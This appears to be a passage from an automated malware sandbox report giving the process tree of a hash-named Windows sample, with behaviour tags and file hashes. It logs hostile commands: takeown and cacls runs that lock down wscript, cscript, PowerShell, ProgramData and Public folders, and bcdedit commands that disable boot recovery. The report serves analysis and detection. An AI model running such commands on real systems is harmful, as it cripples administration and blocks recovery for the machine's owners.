- Suspicious use of AdjustPrivilegeToken
PID:4352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5044
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵PID:1796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3900
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵PID:1900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2616
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2776
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵PID:2936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3332
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1012
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3972
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵PID:3648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4612
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵PID:3944
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:756
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵PID:2988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3896
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵PID:1256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3916
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4288
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4640
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵PID:3900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4744
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:608
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4188
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵PID:3952
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3112
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵PID:3916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2468
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵PID:2300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵PID:2100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2336
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵PID:4692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:864
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵PID:1012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5004
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵PID:608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4028
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵PID:2172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4948
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵PID:2260
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5104
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:1256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4188
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:4112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2912
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2652
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:1436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:752
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵PID:4352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4548
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:3440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2468
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:1368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵PID:4172
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2336
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:4108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3648
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:3972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:608
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:1396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5016
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:4316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:932
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵PID:1928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1876
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:3924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5104
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:4564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:764
-
-
C:\Windows\system32\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵PID:4700
-
-
C:\Windows\system32\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2132
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /g Administrators:f3⤵PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3440
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /g Users:r3⤵PID:508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3692
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵PID:3992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4732
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /d SERVICE3⤵PID:3944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2232
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1756
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /d "network service"3⤵PID:4992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3200
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /d system3⤵PID:3404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3112
-
-
C:\Windows\system32\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵PID:1900
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
PID:3900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4628
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /g Administrators:f3⤵PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3692
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /g Users:r3⤵PID:1528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2832
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4612
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /d SERVICE3⤵PID:1396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:384
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵PID:3676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1052
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /d "network service"3⤵PID:4516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3200
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /d system3⤵PID:4256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1436
-
-
C:\Windows\system32\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exeC:\Users\Admin\AppData\Local\Temp\fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵PID:2396
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:4924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵PID:4296
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:2080
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1036 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:81⤵PID:2988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Documents and Settings\Admin\Local Settings\Microsoft\CLR_v4.0\UsageLogs\fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe.log
Filesize1KB
MD5bdd50fab193bb1a687efd2214c3ddd75
SHA12ed9874e543e755b7d7fb9f52fd687f2c287399f
SHA256bfedba89a98eaff3bc2b9cabf01a9059f5a052e3849fb08f6fa00f845abc11e7
SHA512318c4096b76cdb767ecc13ea9887098312140e2851c0a7b3e925d71bfc9ff03bc14bc8de9c3c38de39bc836368c0e29a09b9603d0769ebab4204895ae2f8c444
-
Filesize
10KB
MD51726416850d3bba46eeb804fae57083d
SHA17e7957d7e7fd7c27b9fb903a0828b09cbb44c196
SHA256c207a7a561ab726fb272b5abd99c4da8e927b5da788210d5dd186023c2783990
SHA5127747e5c6bd77a43ee958cb7b533a73757e8bfb7b3706af4eb7ec9a99458720f89cd30bb23b4cb069826dc36a6ce737424ad0007307be67a7391591f6c936df27
-
Filesize
1KB
MD5aa8423804d80edd99b33342551e63863
SHA1058ee552483270962da08ff3e5057fd590ba3e2b
SHA2568b7fb4cecfc1b4b5e5d2df1de495f63b8a9953cd004d4cbd98670fb2949ce23e
SHA512bf1ae245ee5e7307329b44dc60188afbb10bc2b11dd9c35fac7735d59f48ad4b8b7a158831e3b510bd22778b03d8b8eb11be3b65ce289b0f92bceeecd7671145